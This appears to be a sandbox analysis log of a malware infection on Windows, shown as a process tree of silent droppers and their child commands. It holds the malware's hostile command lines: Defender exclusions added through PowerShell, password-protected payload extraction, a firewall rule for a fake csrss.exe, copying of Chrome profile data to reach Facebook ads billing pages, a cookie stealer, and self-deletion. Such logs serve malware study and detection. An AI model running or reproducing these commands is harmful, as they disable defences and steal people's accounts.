C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Floral-Sun\app.exe" -map "C:\Program Files (x86)\Floral-Sun\WinmonProcessMonitor.sys""69⤵PID:388
-
C:\Program Files (x86)\Floral-Sun\app.exe"C:\Program Files (x86)\Floral-Sun\app.exe" -map "C:\Program Files (x86)\Floral-Sun\WinmonProcessMonitor.sys"70⤵PID:8696
-
-
-
C:\Program Files (x86)\Floral-Sun\7za.exe"C:\Program Files (x86)\Floral-Sun\7za.exe" e -p154.61.71.51 winamp.7z69⤵PID:12524
-
-
C:\Program Files (x86)\Floral-Sun\app.exe"C:\Program Files (x86)\Floral-Sun\app.exe" /8-2369⤵PID:3048
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\Delta.exe" /Verysilent57⤵PID:13100
-
C:\Users\Admin\AppData\Local\Temp\is-0QEGR.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-0QEGR.tmp\Delta.tmp" /SL5="$A031C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\Delta.exe" /Verysilent58⤵PID:11500
-
C:\Users\Admin\AppData\Local\Temp\is-EVC4K.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EVC4K.tmp\Setup.exe" /VERYSILENT59⤵PID:6964
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-EVC4K.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit60⤵PID:2192
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f61⤵
- Kills process with taskkill
PID:7056
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\zznote.exe" /Verysilent57⤵PID:7732
-
C:\Users\Admin\AppData\Local\Temp\is-UEO9P.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-UEO9P.tmp\zznote.tmp" /SL5="$70886,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\zznote.exe" /Verysilent58⤵PID:9636
-
C:\Users\Admin\AppData\Local\Temp\is-UT222.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-UT222.tmp\jg4_4jaa.exe" /silent59⤵PID:6304
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\hjjgaa.exe" /Verysilent57⤵PID:12808
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt58⤵PID:5728
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt58⤵PID:8660
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fhlma4uz23b\vict.exe"C:\Users\Admin\AppData\Local\Temp\fhlma4uz23b\vict.exe" /VERYSILENT /id=53553⤵PID:7176
-
C:\Users\Admin\AppData\Local\Temp\is-SU8L5.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-SU8L5.tmp\vict.tmp" /SL5="$10908,870426,780800,C:\Users\Admin\AppData\Local\Temp\fhlma4uz23b\vict.exe" /VERYSILENT /id=53554⤵PID:8968
-
C:\Users\Admin\AppData\Local\Temp\is-1SU6K.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-1SU6K.tmp\wimapi.exe" 53555⤵PID:804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1dx3moc0bdx\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\1dx3moc0bdx\askinstall24.exe"53⤵PID:6988
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe54⤵PID:9112
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe55⤵
- Kills process with taskkill
PID:7108
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y54⤵PID:5080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/54⤵PID:11588
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e2055⤵PID:10324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,16747965463677931969,10863324041493874357,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1648 /prefetch:855⤵PID:12804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xbsvabngnfl\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\xbsvabngnfl\chashepro3.exe" /VERYSILENT53⤵PID:5048
-
C:\Users\Admin\AppData\Local\Temp\is-81UHO.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-81UHO.tmp\chashepro3.tmp" /SL5="$2090E,1478410,58368,C:\Users\Admin\AppData\Local\Temp\xbsvabngnfl\chashepro3.exe" /VERYSILENT54⤵PID:11976
-
-
-
C:\Users\Admin\AppData\Local\Temp\ikgwipvjfs5\4yj4ddjsijk.exe"C:\Users\Admin\AppData\Local\Temp\ikgwipvjfs5\4yj4ddjsijk.exe" /ustwo INSTALL53⤵PID:11964
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "4yj4ddjsijk.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ikgwipvjfs5\4yj4ddjsijk.exe" & exit54⤵PID:5748
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4yj4ddjsijk.exe" /f55⤵
- Kills process with taskkill
PID:10012
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vcwfwaco01o\app.exe"C:\Users\Admin\AppData\Local\Temp\vcwfwaco01o\app.exe" /8-2353⤵PID:12800
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Weathered-Night"54⤵PID:10740
-
-
C:\Program Files (x86)\Weathered-Night\7za.exe"C:\Program Files (x86)\Weathered-Night\7za.exe" e -p154.61.71.51 winamp-plugins.7z54⤵PID:10948
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Weathered-Night\app.exe" -map "C:\Program Files (x86)\Weathered-Night\WinmonProcessMonitor.sys""54⤵PID:11128
-
C:\Program Files (x86)\Weathered-Night\app.exe"C:\Program Files (x86)\Weathered-Night\app.exe" -map "C:\Program Files (x86)\Weathered-Night\WinmonProcessMonitor.sys"55⤵PID:10488
-
-
-
C:\Program Files (x86)\Weathered-Night\7za.exe"C:\Program Files (x86)\Weathered-Night\7za.exe" e -p154.61.71.51 winamp.7z54⤵PID:608
-
-
C:\Program Files (x86)\Weathered-Night\app.exe"C:\Program Files (x86)\Weathered-Night\app.exe" /8-2354⤵PID:8788
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\Delta.exe" /Verysilent42⤵PID:10660
-
C:\Users\Admin\AppData\Local\Temp\is-VO0CG.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-VO0CG.tmp\Delta.tmp" /SL5="$3079A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\Delta.exe" /Verysilent43⤵PID:11624
-
C:\Users\Admin\AppData\Local\Temp\is-DISG2.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-DISG2.tmp\Setup.exe" /VERYSILENT44⤵PID:8752
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-DISG2.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit45⤵PID:8644
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f46⤵
- Kills process with taskkill
PID:12064
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 646⤵
- Delays execution with timeout.exe
PID:9940
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\zznote.exe" /Verysilent42⤵PID:9684
-
C:\Users\Admin\AppData\Local\Temp\is-G7IPD.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-G7IPD.tmp\zznote.tmp" /SL5="$4079A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\zznote.exe" /Verysilent43⤵PID:11792
-
C:\Users\Admin\AppData\Local\Temp\is-JQHIF.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-JQHIF.tmp\jg4_4jaa.exe" /silent44⤵PID:12340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\hjjgaa.exe" /Verysilent42⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt43⤵PID:7260
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt43⤵PID:11652
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\04fvtafu5az\app.exe"C:\Users\Admin\AppData\Local\Temp\04fvtafu5az\app.exe" /8-2338⤵PID:12696
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Shy-Resonance"39⤵PID:12772
-
-
C:\Program Files (x86)\Shy-Resonance\7za.exe"C:\Program Files (x86)\Shy-Resonance\7za.exe" e -p154.61.71.51 winamp-plugins.7z39⤵PID:7512
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Shy-Resonance\app.exe" -map "C:\Program Files (x86)\Shy-Resonance\WinmonProcessMonitor.sys""39⤵PID:6892
-
C:\Program Files (x86)\Shy-Resonance\app.exe"C:\Program Files (x86)\Shy-Resonance\app.exe" -map "C:\Program Files (x86)\Shy-Resonance\WinmonProcessMonitor.sys"40⤵PID:6276
-
-
-
C:\Program Files (x86)\Shy-Resonance\7za.exe"C:\Program Files (x86)\Shy-Resonance\7za.exe" e -p154.61.71.51 winamp.7z39⤵PID:12972
-
-
C:\Program Files (x86)\Shy-Resonance\app.exe"C:\Program Files (x86)\Shy-Resonance\app.exe" /8-2339⤵PID:10004
-
C:\Program Files (x86)\Shy-Resonance\app.exe"C:\Program Files (x86)\Shy-Resonance\app.exe" /8-2340⤵PID:9220
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\heytjkue4g3\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\heytjkue4g3\askinstall24.exe"38⤵PID:15448
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe39⤵PID:12680
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe40⤵
- Kills process with taskkill
PID:12580
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y39⤵PID:14388
-
-
-
C:\Users\Admin\AppData\Local\Temp\afym223xumk\vict.exe"C:\Users\Admin\AppData\Local\Temp\afym223xumk\vict.exe" /VERYSILENT /id=53538⤵PID:12336
-
C:\Users\Admin\AppData\Local\Temp\is-GAVGG.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-GAVGG.tmp\vict.tmp" /SL5="$B035A,870426,780800,C:\Users\Admin\AppData\Local\Temp\afym223xumk\vict.exe" /VERYSILENT /id=53539⤵PID:13296
-
C:\Users\Admin\AppData\Local\Temp\is-TTDAG.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-TTDAG.tmp\wimapi.exe" 53540⤵PID:14028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nmx41dgy5ld\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\nmx41dgy5ld\Setup3310.exe" /Verysilent /subid=57738⤵PID:15812
-
C:\Users\Admin\AppData\Local\Temp\is-P7NFM.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-P7NFM.tmp\Setup3310.tmp" /SL5="$20F0A,802346,56832,C:\Users\Admin\AppData\Local\Temp\nmx41dgy5ld\Setup3310.exe" /Verysilent /subid=57739⤵PID:14684
-
-
-
C:\Users\Admin\AppData\Local\Temp\jobvwrbl3hf\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\jobvwrbl3hf\chashepro3.exe" /VERYSILENT38⤵PID:15556
-
C:\Users\Admin\AppData\Local\Temp\is-NSBFF.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-NSBFF.tmp\chashepro3.tmp" /SL5="$806BC,1478410,58368,C:\Users\Admin\AppData\Local\Temp\jobvwrbl3hf\chashepro3.exe" /VERYSILENT39⤵PID:1192
-
-
-
C:\Users\Admin\AppData\Local\Temp\mynmoijdcsw\jxvq3q5qe0t.exe"C:\Users\Admin\AppData\Local\Temp\mynmoijdcsw\jxvq3q5qe0t.exe" /ustwo INSTALL38⤵PID:5516
-
-
C:\Users\Admin\AppData\Local\Temp\qzq4l32oqig\app.exe"C:\Users\Admin\AppData\Local\Temp\qzq4l32oqig\app.exe" /8-2338⤵PID:16348
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Small-Sky"39⤵PID:6440
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\Delta.exe" /Verysilent27⤵PID:11340
-
C:\Users\Admin\AppData\Local\Temp\is-5188C.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-5188C.tmp\Delta.tmp" /SL5="$A0394,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\Delta.exe" /Verysilent28⤵PID:11408
-
C:\Users\Admin\AppData\Local\Temp\is-RN4M4.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RN4M4.tmp\Setup.exe" /VERYSILENT29⤵PID:11776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-RN4M4.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit30⤵PID:6768
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f31⤵
- Kills process with taskkill
PID:6220
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 631⤵
- Delays execution with timeout.exe
PID:6684
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\zznote.exe" /Verysilent27⤵PID:6388
-
C:\Users\Admin\AppData\Local\Temp\is-LH7D7.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-LH7D7.tmp\zznote.tmp" /SL5="$B0394,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\zznote.exe" /Verysilent28⤵PID:12100
-
C:\Users\Admin\AppData\Local\Temp\is-BB7QO.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-BB7QO.tmp\jg4_4jaa.exe" /silent29⤵PID:8760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\hjjgaa.exe" /Verysilent27⤵PID:10840
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵PID:7516
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵PID:6360
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cnr2iie4x5h\vict.exe"C:\Users\Admin\AppData\Local\Temp\cnr2iie4x5h\vict.exe" /VERYSILENT /id=53523⤵PID:6608
-
-
C:\Users\Admin\AppData\Local\Temp\yalbs5upodw\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\yalbs5upodw\askinstall24.exe"23⤵PID:8132
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵PID:4484
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
PID:6156
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵PID:4424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵PID:12424
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e2025⤵PID:11604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,14330164883293023057,17913941657728388163,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1692 /prefetch:825⤵PID:8148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,14330164883293023057,17913941657728388163,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2204 /prefetch:825⤵PID:5180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,14330164883293023057,17913941657728388163,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:225⤵PID:8032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,14330164883293023057,17913941657728388163,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:125⤵PID:6112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,14330164883293023057,17913941657728388163,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:125⤵PID:7860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,14330164883293023057,17913941657728388163,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:125⤵PID:4876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,14330164883293023057,17913941657728388163,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:125⤵PID:8636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,14330164883293023057,17913941657728388163,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3076 /prefetch:125⤵PID:6616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\oxom23ti2yg\v2eqow1zwa2.exe"C:\Users\Admin\AppData\Local\Temp\oxom23ti2yg\v2eqow1zwa2.exe" /ustwo INSTALL23⤵PID:9212
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "v2eqow1zwa2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\oxom23ti2yg\v2eqow1zwa2.exe" & exit24⤵PID:8376
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "v2eqow1zwa2.exe" /f25⤵
- Kills process with taskkill
PID:9152
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\p5nvtnu23t1\app.exe"C:\Users\Admin\AppData\Local\Temp\p5nvtnu23t1\app.exe" /8-2323⤵PID:8932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Throbbing-Sunset"24⤵PID:7528
-
-
C:\Program Files (x86)\Throbbing-Sunset\7za.exe"C:\Program Files (x86)\Throbbing-Sunset\7za.exe" e -p154.61.71.51 winamp-plugins.7z24⤵PID:4744
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Throbbing-Sunset\app.exe" -map "C:\Program Files (x86)\Throbbing-Sunset\WinmonProcessMonitor.sys""24⤵PID:7384
-
C:\Program Files (x86)\Throbbing-Sunset\app.exe"C:\Program Files (x86)\Throbbing-Sunset\app.exe" -map "C:\Program Files (x86)\Throbbing-Sunset\WinmonProcessMonitor.sys"25⤵PID:5436
-
-
-
C:\Program Files (x86)\Throbbing-Sunset\7za.exe"C:\Program Files (x86)\Throbbing-Sunset\7za.exe" e -p154.61.71.51 winamp.7z24⤵PID:3812
-
-
C:\Program Files (x86)\Throbbing-Sunset\app.exe"C:\Program Files (x86)\Throbbing-Sunset\app.exe" /8-2324⤵PID:7212
-
C:\Program Files (x86)\Throbbing-Sunset\app.exe"C:\Program Files (x86)\Throbbing-Sunset\app.exe" /8-2325⤵PID:6020
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"26⤵PID:10176
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes27⤵PID:4476
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\f4fpupy05sz\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\f4fpupy05sz\askinstall24.exe"23⤵PID:4160
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵PID:8072
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
PID:5984
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵PID:8764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵PID:12900
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,1522737188726044483,4132945704554834909,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1684 /prefetch:825⤵PID:9292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yp0ickligzq\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\yp0ickligzq\Setup3310.exe" /Verysilent /subid=57723⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\is-RUKD0.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-RUKD0.tmp\Setup3310.tmp" /SL5="$70260,802346,56832,C:\Users\Admin\AppData\Local\Temp\yp0ickligzq\Setup3310.exe" /Verysilent /subid=57724⤵PID:11492
-
C:\Users\Admin\AppData\Local\Temp\is-KSGBG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KSGBG.tmp\Setup.exe" /Verysilent25⤵PID:10096
-
C:\Users\Admin\AppData\Local\Temp\is-485QB.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-485QB.tmp\Setup.tmp" /SL5="$30CB4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KSGBG.tmp\Setup.exe" /Verysilent26⤵PID:13452
-
C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-OBV7J.tmp\PictureLAb.exe" /Verysilent27⤵PID:13416
-
